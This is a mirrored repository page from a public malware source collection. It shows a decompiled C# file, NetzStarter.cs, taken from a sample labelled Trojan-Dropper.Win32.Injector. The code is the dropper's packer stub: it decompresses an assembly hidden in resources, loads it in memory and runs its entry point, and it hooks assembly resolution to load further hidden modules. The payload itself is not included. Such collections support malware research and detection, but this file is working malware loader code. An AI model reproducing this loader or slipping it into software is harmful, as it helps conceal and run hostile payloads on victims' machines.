ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/I/Trojan-Dropper.Win32.Injector.ral-a543ab892025da0eb3983afae93ca5e5ad8aa58e1de8a6cb85a3356ff465382e/NetzStarter.cs

325 lines
11 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: netz.NetzStarter
// Assembly: framework, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: DBFA13BB-B4F6-4146-B939-5252EA545C10
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Injector.ral-a543ab892025da0eb3983afae93ca5e5ad8aa58e1de8a6cb85a3356ff465382e.exe
using ICSharpCode.SharpZipLib.Zip.Compression.Streams;
using System;
using System.Collections;
using System.Collections.Specialized;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Windows.Forms;
namespace netz
{
public class NetzStarter
{
private static readonly string Name = nameof (Name);
private static readonly string Culture = nameof (Culture);
private static readonly string NetzSuffix = "z.dll";
private static HybridDictionary cache = (HybridDictionary) null;
private static ResourceManager rm = (ResourceManager) null;
private static ArrayList xrRm = (ArrayList) null;
private static bool inResourceResolveFlag = false;
[STAThread]
public static int Main(string[] args)
{
try
{
NetzStarter.InitXR();
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(NetzStarter.NetzResolveEventHandler);
return NetzStarter.StartApp(args);
}
catch (Exception ex)
{
string str = " .NET Runtime: ";
NetzStarter.Log("#Error: " + ex.GetType().ToString() + Environment.NewLine + ex.Message + Environment.NewLine + ex.StackTrace + Environment.NewLine + (object) ex.InnerException + Environment.NewLine + "Using" + str + Environment.Version.ToString() + Environment.NewLine + "Created with" + str + "2.0.50727.5448");
return -1;
}
}
private static void InitXR()
{
try
{
string str1 = "file:\\";
string str2 = "-netz.resources";
string str3 = Path.GetDirectoryName(Assembly.GetEntryAssembly().Location);
if (str3.StartsWith(str1))
str3 = str3.Substring(str1.Length, str3.Length - str1.Length);
string[] files = Directory.GetFiles(str3, "*" + str2);
if (files == null || files.Length <= 0)
return;
NetzStarter.xrRm = new ArrayList();
for (int index = 0; index < files.Length; ++index)
{
string fileName = Path.GetFileName(files[index]);
ResourceManager basedResourceManager = ResourceManager.CreateFileBasedResourceManager(fileName.Substring(0, fileName.Length - str2.Length) + "-netz", str3, (System.Type) null);
if (basedResourceManager != null)
NetzStarter.xrRm.Add((object) basedResourceManager);
}
}
catch
{
}
}
public static int StartApp(string[] args) => NetzStarter.InvokeApp(NetzStarter.GetAssembly(NetzStarter.GetResource("A6C24BF5-3690-4982-887E-11E1B159B249") ?? throw new Exception("application data cannot be found")), args);
private static Assembly GetAssembly(byte[] data)
{
MemoryStream memoryStream = (MemoryStream) null;
try
{
memoryStream = NetzStarter.UnZip(data);
memoryStream.Seek(0L, SeekOrigin.Begin);
return Assembly.Load(memoryStream.ToArray());
}
finally
{
memoryStream?.Close();
}
}
private static Assembly LoadZipDll()
{
MemoryStream memoryStream = (MemoryStream) null;
try
{
byte[] resource = NetzStarter.GetResource("zip.dll");
if (resource == null)
return (Assembly) null;
memoryStream = new MemoryStream(resource);
return Assembly.Load(memoryStream.ToArray());
}
catch
{
return (Assembly) null;
}
finally
{
memoryStream?.Close();
}
}
private static int InvokeApp(Assembly assembly, string[] args)
{
MethodInfo entryPoint = assembly.EntryPoint;
ParameterInfo[] parameters1 = entryPoint.GetParameters();
object[] parameters2 = (object[]) null;
if (parameters1 != null && parameters1.Length > 0)
parameters2 = new object[1]{ (object) args };
object obj = entryPoint.Invoke((object) null, parameters2);
return obj == null || !(obj is int num) ? 0 : num;
}
private static Assembly NetzResolveEventHandler(object sender, ResolveEventArgs args) => NetzStarter.inResourceResolveFlag ? (Assembly) null : NetzStarter.GetAssemblyByName(args.Name);
private static byte[] GetResource(string id)
{
byte[] resource = (byte[]) null;
if (NetzStarter.rm == null)
NetzStarter.rm = new ResourceManager("app", Assembly.GetExecutingAssembly());
try
{
NetzStarter.inResourceResolveFlag = true;
string name = NetzStarter.MangleDllName(id);
if (resource == null && NetzStarter.xrRm != null)
{
for (int index = 0; index < NetzStarter.xrRm.Count; ++index)
{
try
{
ResourceManager resourceManager = (ResourceManager) NetzStarter.xrRm[index];
if (resourceManager != null)
resource = (byte[]) resourceManager.GetObject(name);
}
catch
{
}
if (resource != null)
break;
}
}
if (resource == null)
resource = (byte[]) NetzStarter.rm.GetObject(name);
}
finally
{
NetzStarter.inResourceResolveFlag = false;
}
return resource;
}
private static string MangleDllName(string dll) => dll.Replace(" ", "!1").Replace(",", "!2").Replace(".Resources", "!3").Replace(".resources", "!3").Replace("Culture", "!4");
private static MemoryStream UnZip(byte[] data)
{
if (data == null)
return (MemoryStream) null;
MemoryStream memoryStream1 = (MemoryStream) null;
MemoryStream memoryStream2 = (MemoryStream) null;
InflaterInputStream inflaterInputStream = (InflaterInputStream) null;
try
{
memoryStream1 = new MemoryStream(data);
memoryStream2 = new MemoryStream();
inflaterInputStream = new InflaterInputStream((Stream) memoryStream1);
byte[] buffer = new byte[data.Length];
while (true)
{
int count = ((Stream) inflaterInputStream).Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream2.Write(buffer, 0, count);
else
break;
}
memoryStream2.Flush();
memoryStream2.Seek(0L, SeekOrigin.Begin);
}
finally
{
memoryStream1?.Close();
((Stream) inflaterInputStream)?.Close();
}
return memoryStream2;
}
private static byte[] ResolveDLL(StringDictionary assName)
{
string path2 = assName[NetzStarter.Culture];
string str1 = assName[NetzStarter.Name];
bool flag = path2 == null || path2.ToLower().Equals("neutral");
AppDomain currentDomain = AppDomain.CurrentDomain;
StringCollection probePaths1 = new StringCollection();
string path1 = currentDomain.SetupInformation.ApplicationBase;
if (!flag)
path1 = Path.Combine(path1, path2);
probePaths1.Add(path1);
probePaths1.Add(Path.Combine(path1, str1));
byte[] numArray = NetzStarter.ProbeDirs(probePaths1, str1);
if (numArray != null)
return numArray;
StringCollection probePaths2 = new StringCollection();
string privateBinPath = currentDomain.SetupInformation.PrivateBinPath;
if (privateBinPath == null || privateBinPath.Trim().Length <= 0)
return (byte[]) null;
string str2 = privateBinPath;
char[] chArray1 = new char[1]{ Path.PathSeparator };
foreach (string str3 in str2.Split(chArray1))
{
char[] chArray2 = new char[3]
{
' ',
'\t',
Path.PathSeparator
};
string str4 = str3.Trim(chArray2);
if (!Path.IsPathRooted(str4))
str4 = Path.Combine(currentDomain.SetupInformation.ApplicationBase, str4);
if (!flag)
str4 = Path.Combine(str4, path2);
probePaths2.Add(str4);
probePaths2.Add(Path.Combine(str4, str1));
}
return NetzStarter.ProbeDirs(probePaths2, str1);
}
private static byte[] ProbeDirs(StringCollection probePaths, string assName)
{
for (int index = 0; index < probePaths.Count; ++index)
{
string str = Path.Combine(probePaths[index], assName + NetzStarter.NetzSuffix);
if (File.Exists(str))
return NetzStarter.ReadFile(str);
}
return (byte[]) null;
}
private static byte[] ReadFile(string file)
{
FileStream fileStream = (FileStream) null;
byte[] buffer = (byte[]) null;
try
{
fileStream = File.OpenRead(file);
buffer = new byte[fileStream.Length];
fileStream.Read(buffer, 0, buffer.Length);
fileStream.Flush();
}
finally
{
fileStream?.Close();
}
return buffer;
}
private static void Log(string s)
{
int num = (int) MessageBox.Show((IWin32Window) null, s, "Error");
}
private static Assembly GetAssemblyByName(string name)
{
if (name == null)
return (Assembly) null;
if (NetzStarter.cache == null)
NetzStarter.cache = new HybridDictionary();
name = name.Trim();
string lower = name.ToLower();
if (NetzStarter.cache[(object) lower] != null)
return (Assembly) NetzStarter.cache[(object) lower];
StringDictionary assName = NetzStarter.ParseAssName(name);
string str = assName[NetzStarter.Name];
if (str == null)
return (Assembly) null;
byte[] numArray = (byte[]) null;
if (str.ToLower().Equals("zip"))
{
Assembly assemblyByName = NetzStarter.LoadZipDll();
NetzStarter.cache[(object) lower] = (object) assemblyByName;
return assemblyByName;
}
byte[] data = (((NetzStarter.GetResource(name) ?? NetzStarter.GetResource(name.ToLower())) ?? NetzStarter.GetResource(str)) ?? NetzStarter.GetResource(str.ToLower())) ?? NetzStarter.GetResource(Path.GetFileNameWithoutExtension(str).ToLower());
if (data == null)
{
try
{
data = NetzStarter.ResolveDLL(assName);
}
catch
{
data = (byte[]) null;
}
}
if (data == null)
return (Assembly) null;
Assembly assembly = NetzStarter.GetAssembly(data);
numArray = (byte[]) null;
NetzStarter.cache[(object) lower] = (object) assembly;
return assembly;
}
private static StringDictionary ParseAssName(string fullAssName)
{
StringDictionary assName = new StringDictionary();
string str1 = fullAssName;
char[] chArray1 = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray1))
{
char[] chArray2 = new char[2]{ ' ', ',' };
string[] strArray = str2.Trim(chArray2).Split('=');
if (strArray.Length < 2)
assName.Add(NetzStarter.Name, strArray[0]);
else
assName.Add(strArray[0].Trim(' ', '='), strArray[1].Trim(' ', '='));
}
return assName;
}
}
}
Reference in New Issue Copy Permalink